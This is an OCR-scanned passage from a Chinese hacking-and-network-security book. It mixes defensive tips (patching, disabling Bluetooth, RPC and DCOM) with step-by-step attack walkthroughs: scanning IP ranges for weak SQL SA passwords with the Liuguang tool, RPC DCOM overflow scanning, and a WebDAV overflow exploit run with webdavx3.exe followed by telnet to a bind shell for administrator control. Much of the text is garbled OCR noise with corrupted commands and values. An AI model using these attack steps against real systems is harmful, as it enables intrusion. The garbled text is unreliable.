ia 和 


所 且 不 到 避 Windcw 质 呈 天 二 红 过 本 二 


和 林芝 不 本 吾 此 全 于 ，Windows 更 打包 二 只 关 到 二 要 类 条 


Ex0 昌 2 生 二 F Windows 10 1607 本 3 Windows Server 2016 
起 生 也 末了 加 “ 北 半 示 再 ”第 呈 不 全 0j 革 二。 纯 玫 上 人 二 

到 Windows 10 1703 夺 志 三 更 所 戈 Windows Server 

1709 后 二 本 和 可 本， 则 此 第 可 以 下 不 忆 抽 了 的 二 克 下 和 于- 


高 级 失 冶 设置 x 
SQL | Ipc | us |] NGER | Rpc | Msc | ptuGNs | 运 员 
设 墅 |PoRTs |Pop3 | Fp |sMre | IMAP | TELNET | CG! | cGl Rules 

19216801 


192.168.0.255 


回 人 @CGI/ASP 
回 


MAIPC 
MI@Is 
IAAINGFR 总 


ER 


Ce 


step 园 单 击 “ 确 定 ” 按 钮 ， 即 可 保存 设置 ， 
这 样 就 可 以 阻止 更 新 硬件 驱动 程序 了 ， 如 
下 图 所 示 。 


step 图 切换 到 SQL 选项 卡 ， 在 其 中 选中 “对 
SA 密码 进行 猜 解 ” 复 选 框 ， 如 下 图 所 示 。 


高 级 浅 郊 设置 X 


| poRrs | Pop3 | FP 


| swr? | ,MApP | TELNET | CG! | cGl Rules 
sa | ec Jus 


| RNGER | RpPc | Misc | PtuGINs | 运 项 
国 汰 过 通过 下 滑 获 取 宅 码 
国 了 SA 和风 
国 MSSQL 2000 版 本 检查 


四 = 写 Xx 
文本 站 杰作 出 看 M) 大 (1 
各 中 | 册 罗 | 忆 | 上 日 四 了 
Mi Ty 
福 坪 Intranet Microsoft 更 新 有 各 位 置 A 
网 NeW | 回击 A 
S oneo | B erm windovs BAR 2 
SV) ean Windows mbaeesaRR = 
wae | B asm Windows EF Intemet (村 ed 
fd |E = 
和 
于 本 时 
[a 
EE 
地 有 已 登 录用 的 计算 作 ， 计 划 的 更 新 寻 丰 执行 重水 瑟 和 
,过 再 失重 牢记 = 
A 
A 
= 
| 一 | 
31 个 设置 | 


得 实战 演练 2 一 一 探测 目标 主机 的 弱 口令 


使 用 《流光 》 可 以 探测 目标 主机 的 
POP3、SQL、FTP、HTTP 等 弱 口 令 。 下 面 
具体 介绍 一 下 使 用 《流光 》 探 测 SQL 弱 口 
令 的 具体 操作 步 又 。 

[step 图 在 《流光 》 的 主 窗口 中 ， 选 择 “ 探 
测 ” 一 “高 级 扫描 工具 ”菜单 命令 ， 即 可 
打开 “高 级 扫描 设置 ”对 话 框 ， 在 其 中 填 
入 起 始 地 址 、 结 束 地 址 ， 并 选择 目标 系统 ， 

再 在 “检测 项 目 ” 列 表 中 选中 SQL 复 选 框 ， 

如 下 图 所 示 。 


Cm] w | sn | ww | 
[Step 图 单 击 “ 确 定 ” 按 钮 ， 即 可 打开 “选择 
流光 主机 ”对 话 框 ， 如 下 图 所 示 。 

过 流光 主机 x 
主机 : 端口 : |3595 
用 户 名 [ashest 密码 : 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[ep 园 单 去 “开始 ”按钮 ， 即 可 开始 扫描 ， 
扫描 完毕 的 结果 如 下 图 所 示 ， 在 其 中 可 以 
看 到 如 下 主机 的 SQL 弱 口 令 。 


介 后 Ms 时 (7 = .OX 


SQL-> 猜 解 主机 192.168.0.7 端口 1433 
= a2 

SQL-> 猜 解 主机 192.168.0.16 端口 1433 
...Sa:NULL 


[step 较 还 可 以 使 用 SQL 主机 扫描 方式 。 在 
“流光 ” 主 窗口 中 ， 选 择 “ 探 测 ” 一 “ 扫 
描 POP3/FTP/NT/SQL 主机 ”菜单 命令 ， 即 
可 打开 “主机 扫描 设置 ”对 话 框 ， 在 其 中 
设置 扫描 的 卫 地 址 范围 ， 并 从 “扫描 主机 
类 型 ”下 拉 列 表 中 选择 SQL 选项 ， 如 下 图 
所 示 。 
主机 扫 所 设置 
扫 措 范围 
开始 地 址 : 


192.168.0.1| 


结束 地 址 : |192.168.0.255 


扫 据 主机 类 型 ， [5QL | 
国 党 用 密码 扫描 。。 园 将 Frontpage 主 机 自动 加 入 HTTP 主 机 列表 
国 将 扫 扬 成功 的 结果 加 入 当前 设置 。 | 确定 (0) | | 取消 CO | 


EG 国 单 去 “确定 ”按钮 ， 即 可 开始 扫描 ， 
扫描 完成 后 给 出 具体 的 扫描 结果 ， 如 下 图 
所 示 。 


失控 结果 


3 
192.168.0.135 : PORT : SQL 


(0) 
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3.5 ”小 试 身手 
练习 1: CPU 高 危 漏 洞 “ 裂 谷 ” 

微软 在 修复 “幽灵 ”和 “熔断 ”两 个 
CPU 高 危 漏洞 过 程 中 ， 产 生 了 新 安全 漏洞 
“ 裂 谷 (TotalMeltdown)”。 攻 击 者 可 利用 
漏洞 获取 敏感 信息 , 控制 受害 者 系统 。 不 过 ， 
使 用 电脑 管家 的 “ 裂 谷 ”漏洞 修复 工具 可 
以 修复 该 漏洞 ， 具 体 的 操作 步骤 如 下 。 
[sep 回 下 载 并 安装 “有 裂 谷 ”漏洞 修复 工具 ， 
即 可 打开 “和 裂 谷 ”漏洞 修复 工具 工作 界面 ， 
并 自动 检测 当前 计算 机 的 “ 裂 谷 ” 漏 洞 ， 
如 下 图 所 示 。 


名 电 脑 守 未 - “各 从 淹 简 修 坚 工 具 


正在 检测 " 裂 谷 "漏洞 


黑 窑 可 能 全 利用 议 珊 酒 可 取 您 的 隐私 数据 


正在 检测 ， 请 稍 候 . 


[step 图 检测 完毕 后 ， 会 给 出 相应 的 提示 ， 如 
果 发 现 了 “ 裂 谷 ”漏洞 ， 则 提示 用 户 立即 
修复 ， 这 时 按照 系统 提示 修复 即 可 ， 如 下 
图 所 示 。 


ECETTEEE ET 


发 现 ` 裂 谷 " 漏 洞 


局 帮 可 辽 全 科 作 二 量 全 四 到 人 m4 时 


step 图 如 果 扫 描 完 成 后 ， 没 有 发 现 “ 裂 谷 ” 
漏洞 ， 也 会 给 出 相应 的 提示 ， 如 下 图 所 示 。 


加 电脑 管 未 - “型 作 "天 洞 保皇 工具 


VY 未 发 现 " 裂 谷 "漏洞 ， 电 脑 安全 


局 漏 届 防护 贴 十 
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= 
Windows 设置 
F 
号 时 口 
@ Ee 二 


step 图 单 去 “设备 ”图 标 ， 进 入 “蓝牙 和 


器 六 导 练习 2: 蓝牙 协议 中 的 BlueBorne 漏 洞 


蓝牙 协议 中 的 BlueBome 漏洞 可 以 使 
53 亿 台 带 蓝 牙 的 设备 受到 影响 ， 这 种 影响 
包括 安 卓 、iOS、Windows、Linux 在 内 的 
所 有 带 蓝牙 功能 的 设备 ， 攻 击 者 甚至 不 需 
要 进行 设备 配对 ， 就 能 发 动 攻击 ， 完 全 控 
制 受害 者 设备 。 

攻击 者 一 旦 触发 该 漏洞 ， 计 算 机 会 在 
用 户 没有 任何 感知 的 情况 下 ， 访 问 攻 击 者 
构造 的 钓鱼 网 站 。 不 过 ， 微 软 发 布 了 Blue- 
Bome 漏洞 的 安全 更 新 ， 广 大 用 户 使 用 电脑 
管家 及 时 打 补 丁 ， 或 手动 关闭 蓝牙 适配器 ， 
可 有 效 规避 BlueBome 攻击 。 

关闭 计算 机 中 蓝牙 设备 的 操作 步 又 
如 下 。 
step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “设置 ”菜单 命令 ， 如 下 图 所 示 。 


step 园 弹出 “设置 ”窗口 ， 在 其 中 显示 
Windows 设置 的 相关 项 目 ， 如 下 图 所 示 。 


其 他 设备 ”工作 界面 ， 在 其 中 显示 了 当前 
计算 机 的 蓝牙 设备 处 于 开启 状态 ， 如 下 图 
所 示 。 

= Dx 
蓝牙 和 其 他 设备 


a wma 


命 页 


设备 EF 


卉 “ 复 可 和 上 其 他 设备 @D 天 

Dy UO 现在 可 以 F 为 "897GQWDC8IOUUQ8 枢 必 到 
0 Wm 鼠标 、 键 盘 和 第 

tenovo Black Si USB Keyboard 

回答 入 
£ BWindows Ink Om tn 

自动 下 

音频 


上 六 要 eahek Hoh Defiition Audio) 


[step 图 单 去 “蓝牙 ”下 方 的 “ 开 ” 按 钮 ， 即 
可 关闭 计算 机 的 蓝牙 设备 ， 如 下 图 所 示 。 


| 到 = 
全 地 蓝牙 和 其 他 设备 

Ge 5 添加 牙牙 或 其 他 设备 

A 到 牙 

局 FA OO 


鼠标 、 键 盘 和 笔 
国 | Lenovo edk Sik Sa Keyboard 


回 Ga 


音频 


关 有 3 Reahek Hon Deniion Nui) 
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第 4 童 


缓冲 区 溢出 攻击 与 


网 络 渗透 入 侵 


缓冲 区 溢出 攻击 是 一 种 常见 的 且 危 害 性 很 大 的 系统 攻击 手段 ， 利 用 缓冲 区 溢出 攻击 可 
以 实现 网 络 渗透 入 侵 与 提 权 。 本 章 介绍 缓冲 区 溢出 攻击 与 网 络 渗透 入 侵 的 相关 知识 ， 主 要 
内 容 包括 认识 缓冲 区 溢出 攻击 、 缓 冲 区 溢出 攻击 的 相关 实例 以 及 如 何 防止 缓冲 区 溢出 攻击 


等 内 容 。 


4.1 什么 是 缓冲 区 溢出 攻击 


缓冲 区 溢出 攻击 之 所 以 危害 性 极 大 
主要 原因 是 入 侵 者 利用 系统 存在 的 缓冲 区 
溢出 漏洞 直接 向 其 发 送 超出 缓冲 区 所 能 处 
理 的 长 度 的 指令 ， 致 使 系统 进入 不 稳定 的 
状态 ， 这 是 从 程序 或 系统 的 关键 敏感 区 域 
进行 攻击 。 下面 剖析 绥 冲 区 溢出 攻击 , 因为 ， 
只 有 知己 知 彼 ， 才 能 百 战 不 列 。 


缓冲 区 溢出 概述 


要 想 充 分 了 解 什么 是 缓冲 区 溢出 ， 首 
先 需要 了 解 什么 是 缓冲 区 。 缓 冲 区 是 程序 
运行 时 自动 向 计算 机 内 存 申 请 的 一 个 连续 
的 块 , 用 于 保存 程序 给 定 类 型 的 数据 。 但 是 ， 
一 般 为 了 节省 内 存 的 使 用 大 小 ， 操 作 系 统 
会 利用 一 个 有 动态 分 配 变 量 的 程序 在 程序 
运行 时 才 决 定 给 其 分 配 多 少 内 存 。 

由 于 缓冲 区 的 分 配 是 由 系统 的 一 个 动 
态 分 配 变 量程 序 决 定 ， 那 么 ， 如 果 程 序 在 
动态 分 配 缓冲 区 放 入 太 多 的 数据 会 出 现 什 
么 现象 呢 ? 很 显然 ， 它 溢出 了 ， 这 就 像 往 
杯子 注入 水 一 样 ， 一 旦 水 超过 了 杯子 的 容 
量 ， 就 会 溢出 而 流 到 杯子 外 面 。 对 于 计算 
机 来 说 ， 这 就 造成 了 缓冲 区 的 溢出 ， 这 些 
溢出 的 数据 就 会 “ 流 到 ”其 他 的 程序 或 系 
统 缓 冲 区 之 中 ， 和 覆盖 其 他 程序 或 系统 的 合 
法 数据 ， 进 而 被 其 他 程序 或 系统 所 执行 。 


4.1.1 


正 是 由 于 这 个 溢出 现象 被 入 侵 者 发 现 
了 ， 因 此 ， 他 们 就 会 向 程序 的 缓冲 区 写 入 
超出 其 长 度 的 数据 ， 从 而 破坏 程序 的 堆栈 
结构 ， 使 程序 转向 执行 自己 所 设计 的 入 侵 
执行 ， 以 达到 攻击 的 目的 ， 这 就 是 缓冲 区 
溢出 攻击 。 

总 之 ， 由 于 缓冲 区 溢出 攻击 具有 易于 
攻击 且 危 害 性 极 大 的 特点 ， 己 经 成 为 当前 
很 流行 的 一 种 网 络 攻 击 方法 ， 这 给 系统 的 
安全 带 来 了 极 大 的 隐患 。 作 为 计算 机 用 户 
或 网 络 管理 员 一 定 要 及 时 有 效 地 检测 出 计 
算 机 网 络 系统 的 入 侵 行 为 ， 做 好 防范 。 


4.1.2 缓冲 区 溢出 简单 实例 


在 介绍 了 缓冲 区 溢出 的 相关 内 容 之 后 ， 
对 于 没有 一 定 计算 机 知识 的 用 户 来 说 ， 可 
能 还 很 难 理解 ， 那 么 下 面 就 介绍 一 个 缓冲 
区 溢出 的 简单 实例 ， 具 体形 象 地 介绍 一 下 
什么 是 “溢出 ”。 

这 里 以 Windows 10 操作 系统 为 例 进行 
介绍 ， 产 生 缓冲 区 溢出 的 过 程 如 下 。 
[step 轩 在 Windows 10 操作 系统 界面 选择 “ 开 
始 ” 一 “运行 ”菜单 命令 ， 打 开 “ 运 行 ? 
对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd， 
按 Enter 键 ， 打 开 “ 命 令 提 示 符 ”窗口 ， 如 
下 图 所 示 ， 这 是 Windows 系统 自 带 的 命令 
行 工 具 ， 可 执行 各 种 内 置 的 命令 程序 。 
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丽 管理 员 : C\windows\system32\cmd.exe 和 口 x 


icrosoft Windows [版 本 10. 0. 16299. 936] ^ 
(c) 2017 Mi crosoft Corporation。 保 留 所 有 权利 。 


:\Users\Administrator> 


[Eee 加 在 “命令 提示 符 ” 窗 口中 输入 di 命令 
然后 按 Enter 键 ， 即 可 显示 系统 目 录 中 的 所 
有 文件 、 目 录 及 相关 信息 ， 如 下 图 所 示 。 


大 管理 局: Ciwindowsvsystem32wmdexe - 0 x 


有 crosoft 姐 ndows [版 本 10.0, 16299. 936] ~ 
(2) 2017 对 crosoft Corporation。 保留 所 有 权利 。 


dopa Mig 
i 是 Windowsl0 
a 11AB 
C:\Usars\Administrator 的 目录 
019/703109 15:56 


2019/03/09 DIR> 

019/02/19 <DIR> 

O10/03/00 <DIR> unage 
2019/01/26 KDIR> 

019/01111 <DIR> 

019/01726 <DIR> 

2019/03/09 <DIR> 

019/02/23 <DIR> 

19/01/26 <DIR> 

19/02/ 14 DIR> Favoritas 
019/01/26 ‘DIR Links 
019401726 CDIR> Musi 
2019/02/19 ‘<DIR> i 
2019/01/26 <DIR> Saved Games 
0197D1/2 <DIR> Searchez 
019/02/16 <DIR> UTDowner 
O19/01/26 10:41 fpIE> Videes 


18 8 人 67, 005, 411,328 3 亲 半 节 


J: \llsers\Administrator> 


[step 图 dir 命 令 还 可 以 指定 列表 显示 的 路 径 ， 
在 “命令 提示 符 ” 窗 口中 输入 dir c'\ 命令， 
然后 按 Enter 键 ， 即 可 显示 C 盘 根 目 录 下 的 
文件 以 及 目录 信息 ， 如 下 图 所 示 。 


ER Cwindows\system32\cmd exe = 各 XX 
Ee ci 
是 对 ndbws10 
ie 

ei\ 
019/02/16 1, 024 ,md 
019703/D1 2, 166, 784 111. evtx 
0 346 daina bat 
013/02/27 DIR> data 
019/01/25 705 del.bat 
017/11/22 DIR> ET 
019/01/26 48 InetallConfig.ini 
019701/28 <DIR> Trtel 
019/01/21 0 jc txt 
019/03/12 <DIR> netasploit 
013/03/01 325 offline FtnInio. txt 
019/01/25 DIR> PerfLogs 
013/03/12 <DIR> Program Files 
019703/12 <DIR Prograr Files (x86) 
Ba <DIR> safemon 
019/01/12 DIF> Je 
019703/09 DI 

性 2. 169. 2 了 全 


个 : 
10 WN 7, 005, 386, 752 可 用 字 节 


C:\sers\Adninistirator>e 


[step 园 如 果 在 “命令 提示 符 ” 窗 口中 指定 一 
个 不 存在 的 路 径 ， 那 么 将 会 显示 “文件 名 、 
目录 名 或 卷 标语 法 不 正确 。” 提 示 信 息 。 
例如 ， 输 入 dir \?\cccccccccccc 命令 ， 
后 按 Enter 键 ， 即 可 显示 执行 结果 ， 如 下 图 
所 示 。 


国 管 于 CWwindows\system32\cmdexe 一 口 x 
:\Users\Administrator>dir \\ ? Ncccccccccccc A 


件 名 、 目 录 名 或 卷 标语 法 不 正确 。 


:AMUsersNAdministrator>。 


[Eee 图 从 上 述 实例 中 ， 可 以 看 出 dir 命令 是 

一 个 功能 相对 比较 完善 的 显示 文件 及 目录 

信息 的 程序 ， 似 乎 与 系统 的 安全 并 没有 什 
么 关系 。 但 是 如 果 改 变 上 述 的 命令 ， 在 “ 命 

令 提 示 符 ”窗口 中 输入 如 下 图 所 示 的 dir 命 

令 dir \? \cccccccccccc……"CCCCCCcCcCcCccCccC 
(多 于 200 个 c) 。 


丽 管理 员 : C\windows\system32\cmd.exe - 0O x 


:MUsersNAdministrator>dir \\ ? Ncccccccccccccccccc 
cccccccccccccccCccccccccCccCCCccCCCCCCCccCCCCCCcCCCcccC 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccCcccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccccccccccccccccccccccccccccccccccc 
cccccccccccccccccCcCcCcCCCCCCCCCCCCCCCCCCCCCCCCCCC 


四 输入 完毕 后 ， 按 Enter 键 ， 即 可 看 到 
一 个 意外 的 结果 ， 弹 出 cmd 程序 错误 的 信 
息 提示 框 ， 如 下 图 所 示 ， 这 就 是 一 个 典型 
的 溢出 小 实例 。 


cmd exe - 应 用 程序 错误 


(x serr=sEseaocooora, ae= HE xd. 


.| 
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4.2 RPC 服务 远程 溢出 漏洞 
攻击 


RPC 协议 是 Windows 操作 系统 使 用 的 
一 种 协议 ， 提 供 了 系统 中 进程 之 间 的 交互 
通信 ， 人 允许 在 远程 主机 上 运行 任意 程序 。 
在 Windows 操作 系统 中 使 用 的 RPC 协议 ， 
包括 Microsoft 其 他 一 些 特定 的 扩展 ， 系 统 
大 多 数 的 功能 和 服务 都 依赖 于 它 ， 它 是 操 
作 系统 中 极为 重要 的 一 个 服务 。 


六 吕 绝招 1: RPC 服 务 远 程 溢出 漏洞 入 侵 演示 
RPC 全 称 是 Remote Procedure Call， 在 
操作 系统 中 ， 它 默认 是 开启 的 ， 为 各 种 网 
络 通信 和 管理 提供 了 极 大 的 方便 ， 但 也 是 
危害 极 大 的 漏洞 攻击 点 ， 曾 经 的 冲击 波 、 
震荡 波 等 大 规模 攻击 和 蠕虫 病毒 都 是 Win- 
dows 系统 的 RPC 服务 漏洞 造成 的 。 可 以 说 ， 
每 一 次 的 RPC 服务 漏洞 的 出 现 且 被 攻击 ， 
都 会 给 网 络 系统 带 来 一 场 灾难 。 

DComRpc 接口 漏洞 对 Windows 操作 系 
统 乃 至 整个 网 络 安全 的 影响 ， 可 以 说 超过 
了 以 往 任何 一 个 系统 漏洞 。 其 主要 原因 是 
DCOM 是 目前 几乎 各 种 版 本 的 Windows 系 
统 的 基础 组 件 ， 应 用 比较 广泛 。 下 面 就 以 
DComRpc 接口 漏洞 的 溢出 为 例 ， 详 细 讲 述 
溢出 的 方法 。 
将 下 载 的 DComRpc.xpn 插件 复制 到 
X-Scan 的 plugins 文件 夹 中 ， 作 为 X-Scan 
插件 ， 如 下 图 所 示 。 
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[lstep 图 运行 X-Scan 扫描 工具 ， 选 择 “ 设 
置 ” 一 “扫描 参数 ”选项 ， 打 开 “ 扫 描 参 数 ” 
对 话 框 ， 再 选择 “全 局 设置 ”一 “扫描 模块 ” 
选项 ， 即 可 看 到 添加 的 “DComRpc 溢出 漏 
洞 ” 模 块 ， 如 下 图 所 示 。 


EE 一 x 


和 和 让 , 


Deorapc WRWndowsg7 Ocom Rec 所 


在 使 用 义 -Scan 扫描 到 具有 DComRpc 
接口 漏洞 的 主机 时 ， 可 以 看 到 在 X-Scan 中 
有 明显 的 提示 信息 ， 并 给 出 相应 的 HIML 
格式 的 扫描 报告 。 


EDT TE . 


基于。 寺 / 台 再 安全 吕 拉 月 新 方 达 
的 oe 


now urasrnanrsac 


mesaus ms tm y| 


如 果 使 用 RpcDcom.exe 专用 DComRPC 
溢出 漏洞 扫描 工具 ， 则 可 先 打 开 “ 命 令 提 
示 符 ”窗口 , 进入 RpcDcom.exe 所 在 文件 夹 ， 
执行 “rpcdcom -d 卫 地 址 ”命令 ， 开 始 扫 
描 并 会 给 出 最 终 的 扫描 结果 ， 如 下 图 所 示 。 


而; 管理 员 : C\WINDOWS\system32\cmd.. 一 口 x 


Jicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>cd c:\ 
c:\>cd rpcdcom 


c:\RpcDcomrpcdcom -d 192. 168. 0. 130- 


家 昌 绝招 2: RPC 服 务 远程 溢出 漏洞 的 防御 


RPC 服务 远程 漏洞 可 以 说 是 Windows 

系统 中 最 为 严重 的 一 个 系统 漏洞 ， 下 面 介 
绍 几 个 RPC 服务 远程 漏洞 的 防御 方法 ， 
以 使 自己 的 计算 机 或 系统 处 于 相对 安全 的 
状态 。 


1. 及 时 为 系统 打 补 丁 


防御 系统 出 现 漏洞 最 直接 、 有 效 的 弥 
补 方法 是 打 补 丁 ， 对 于 RPC 服务 远程 溢出 
漏洞 的 防御 也 是 如 此 。 不 过 在 对 系统 打 补 
丁 时 ， 务 必要 注意 补丁 相应 的 系统 版 本 。 


2. 关闭 RPC 服 务 


关闭 RPC 服务 也 是 防范 DComRpec 漏 
洞 攻击 的 方法 之 一 ， 而 且 效 果 非 常 彻 底 。 其 
具体 的 方法 为 : 选择 “开始 ”一 “设置 ”一 “ 控 
制 面板 ”一 “管理 工具 ”选项 , 在 打开 的 “ 管 
理工 具 ” 窗 口中 双击 “服务 ”图 标 , 打开 “ 服 
务 ” 窗 口 。 在 其 中 双击 Remote Procedure 
Call 服务 项 ， 打 开 其 属性 窗口 。 在 属性 窗口 
中 将 启动 类 型 设置 为 “禁用 ”， 这 样 自 下 次 
开机 时 RPC 将 不 再 启动 ， 如 下 图 所 示 。 
第 规 。 登录 。 恢复 。 依存 关系 


服务 称 , BE 


显示 名 称 : Remote Procedure Call (RPC) 


接 术 : RPCSS 服务 是 COM 和 DCOM 服务 部 的 服务 控制 管 和 
理 器 。 它 执行 COM 和 DCOM 服务 器 的 对 象 考 活 清 


可 执行 文件 的 路 径 : 
CAWINDOWS\system32\svchost.exe -k rpess 


启动 % 型 (E): 国 用 
服务 状态: 已 人 上 
启动 (S) 人 a Bil 


当 从 此 处 宫 动 服务 时 ， 你 可 描 定 所 适用 的 启动 参数 . 


BN EB 
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另外 ， 还 可 以 在 注册 表 编 辑 器 中 将 
HKEY LOCAL MACHINE\SYSTEM\Cur- 
rentControlSet\Services\RpcSs 的 Start 的 值 
由 4 变 成 2， 重 新 启动 计算 机 ， 如 下 图 所 示 。 


HEY LOCAL MACHINESYSTEN\ CarrertC ontrolSeNS ences\RpcSs 


不 过 ， 进 行 这 种 设置 后 ， 将 会 给 Win- 
dows 的 运行 带 来 很 大 的 影响 。 例 如 ，Win- 
dows 10 从 登录 系统 到 显示 桌面 画面 ， 要 等 
待 相当 长 的 时 间 。 这 是 因为 Windows 的 很 
多 服务 都 依赖 于 RPC， 因 此 ， 在 将 RPC 设 
置 为 无 效 后 ， 这 些 服 务 将 无 法 正常 启动 。 
所 以 ， 这 种 方式 的 次 端 非常 大 ， 一 般 不 能 
采取 关闭 RPC 服务 。 


3. 手动 为 计算 机 启用 或 禁用 ) DCOM 


针对 具体 的 RPC 服务 组 件 ， 用 户 还 可 
以 采用 具体 的 方法 进行 防御 。 例 如 ， 禁 用 
RPC 服务 组 件 中 的 DCOM 服务 ， 可 以 采用 
如 下 方式 进行 ， 这 里 以 Windows 10 操作 系 
统 为 例 ， 其 具体 的 操作 步骤 如 下 。 


[step 轩 选择 “开始 ”一 “运行 ”选项 ， 打 开 
“运行 ”对 话 框 ， 在 “打开 ”文本 框 中 输 
入 dcomcnfg 命令 ， 单 击 “ 确 定 ” 按 钮 ， 打 
开 “ 组 件 服务 ”窗口 ， 选 择 “ 控 制 台 根 节 
点 ”一 “组 件 服务 ”一 “计算 机 ”一 “我 
的 电脑 ”选项 ， 进 入 “我 的 电脑 ”文件 夹 ， 
若 对 于 本 地 计算 机 ， 则 需要 右 击 “ 我 的 电 
脑 ” 选 项 ,从 弹出 的 快捷 菜单 中 选择 “属性 ” 
选项 ， 如 下 图 所 示 。 
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后 志和 - oO x 
各 文件 朋 ” 强 作 A) 理 看 N) 而 DiW) 于) 
各 中 | 才 辐 | 光 目 日 纪 | 上 日 硬 | 全 


[step 较 打开 “我 的 电脑 属性 ”对 话 框 ， 选 择 
“默认 属性 ”选项 卡 ， 进 入 “默认 属性 ” 
设置 界面 ， 取 消 选中 的 “在 此 计算 机 上 启 
用 分 布 式 COM (E)” 复 选 框 ， 单 击 “ 确 定 ” 
按钮 即 可 ， 如 下 图 所 示 。 


ie 属性 LE 


Rm WR MABE MM COMS MSDIC 


口径 机 上 让 用 全 布 式 COM 人 


/从 布 式 COM 通信 人 

有 EEE 上 人 
WATER 
二 


现 和 二 失 宇 应 用 全 了 可 以 户 宇 所 用， 有 RN 呈 司 以 全 有 安江 
和 人 
人) 


入 信人 不 后 硬 S，113JL 4 NS 全 


了 入 天 2 于。 


J 


EN) 


6 国 对 于 远程 计算 机 ， 则 需要 右 击 “ 计 算 
机 ”选项 ， 在 弹出 的 快捷 菜单 中 选择 “新 
建 ” 一 “计算 机 ”菜单 命令 ， 如 下 图 所 示 。 


乱 六 件 们 。 担 fs()。 站 看 NI 窗口 WD 项 动 (H 
中 中 | 和 由 辐 | 尖 目 日 | 日 国 | 二 | 党 


Estee 加 打开 “添加 计算 机 ”对 话 框 ， 直 接 输 
入 计算 机 名 或 单 击 右 侧 的 “浏览 ”按钮 来 
搜索 计算 机 ， 如 下 图 所 示 。 


去 00 计算 机 x 
议定 
EF 输入 计算 机 人 名， 或 单 二 "浏览 "按钮 净 索 计 算 机 
E99 
I E(B). 


4.3 ” WebDAV 缓冲 区 溢出 攻击 

WebDAV 漏洞 也 是 系统 中 常见 的 漏洞 
之 一 ， 黑 客 利用 该 漏洞 进行 攻击 ， 可 以 获 
取 系 统管 理 员 的 最 高 权限 。 


绝招 3: WebDAV 缓 冲 区 溢出 漏洞 入 侵 哑 闫 浊 


WebDAV 缓冲 区 溢出 漏洞 出 现 的 主要 
原因 是 IS 服务 默认 提供 了 对 WebDAV 的 
支持 ，WebDAV 可 以 通过 HITP 向 用 户 
提供 远程 文件 存储 的 服务 ， 但 是 该 组 件 不 
能 充分 检查 传递 给 部 分 系统 组 件 的 数据 。 
这 样 ， 远 程 攻击 者 利用 这 个 漏洞 就 可 以 对 
WebDAV 进 行 攻击 ， 从 而 获得 LocalSystem 
权限 ， 进 而 完全 控制 目标 主机 。 

下 面 简 单 介绍 一 下 WebDAV 缓冲 区 洲 
出 攻击 的 过 程 。 入 侵 之 前 攻击 者 需要 准备 
两 个 程序 ， 即 WebDAYV 漏洞 扫描 器 一 Web- 
DAVScan exe 和 溢出 工具 webdavx3.exe， 具 
体 的 操作 步骤 如 下 。 


EE 
~ 入 起 件 报 务 


区 
Ss 


[stsp 轩 下载 并 解压 缩 WebDAV 漏洞 扫描 器 ， 
在 解压 后 的 文件 夹 中 双击 WebDAVScan.exe 
可 执行 文件 , 即 可 打开 其 操作 主 界面 ,在 “起 
始 IP” 和 “结束 IP” 文 本 框 中 分 别 输入 要 
扫描 的 他 地 址 范围 ， 如 下 图 所 示 。 


本 w-bDAVscwr v10 二 ( 革 如 | 一 


Ta 二 一 — es 

ES [EE 3 RE: 50” 起 05 六 0: 同 
CJ] 蚀 

ET I I eee rrr | 


[step 图 输入 完毕 后 ， 单 击 “ 扫 描 ” 按 钮 ， 即 
可 开始 扫描 目标 主机 ， 该 程序 运行 速度 非 
常 快 ， 可 以 准确 地 检测 出 远程 IS 服务 器 
是 否 存在 WebDAV 漏洞 ， 在 扫描 列表 中 的 
WebDAV 列 中 凡是 标明 Enable 的 ， 说 明 该 
主机 存在 漏洞 ， 如 下 图 所 示 。 


图 WebDAvscan v10 和 ae 蝇 ) - 
| 宇 寺 8 
[er fe 5T re ET EE 
EE Li 
Te re ET 


192 1 .0.7 查看 天 站 点 
0 
DX 


step 图 选择 “开始 ”一 “运行 ”选项 ， 打 开 
“运行 ”对 话 框 ， 在 “打开 ”文本 框 中 给 
入 cmd， 单 击 “确定 ”按钮 ， 打 开 “ 命 令 
提示 符 ” 窗 口 ， 输 入 cd ci\ 命 令 ,进入 C 盘 
目录 中 ， 如 下 图 所 示 。 

管理 员 : CN\WINDOWS\system32Vcm.… 二 口 x 


Jiicrosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 JIicrosoft Corporation。 保 留 所 有 权利 。 


C:AMUsersNAdministrator>cd c:\ 
cy> 


v 


step 园 在 C 盘 目录 中 输入 “webdavx3.exe 
192.168.0.10” 命 令 ， 按 Enter 键 ， 即 可 开始 
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溢出 攻击 ， 如 下 图 所 示 。 


丽 等 至 呈 : WINDOWS\system32\cmd.exe 一 口 x 


了 crosoft Windows [版 本 10.0. 17134, 319] ~ 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 
C:NUsersNAdministratorycd c:\ 

c:Vywebdavx3. exe 192. 168. 0.10 

TIS WebDAV overfiow remote exploit by isno@xfocus.org 

start to try offset 

STOP a long time, you can press “C and teinet 192.168.0.10 7788 
try offset 0 

try offset 1 

try offset 2 

ry offset 3 

waiting for iis restart. 


其 运行 结果 如 下 : 


IIS WebDAV overflow remote exploit by 
isno@xfocus.org 

start to try offset 

if STOP a long time, you can press 
eand telnet 192>16050:10 7788 

try offset: 0 

try offset: 1 

try offset: 2 

七 工 w Off£5eE" 3 

,ot 
restart. oe 


[Sep 图 如 果 出 现 上 面 的 结果 则 表明 溢出 成 
功 ， 稍 等 2~3 分 钟 后 ， 按 Ctrl+C 组 合 键 结 
束 溢出 ， 再 在 “命令 提示 符 ” 窗 口中 输入 
telnet 192.168.0.10 7788 命令 ， 如 下 图 所 示 ， 
当 连 接 成 功 后 ， 则 就 可 以 拥有 目标 主机 的 
系统 管理 员 权 限 ， 即 可 对 目标 主机 进行 任 
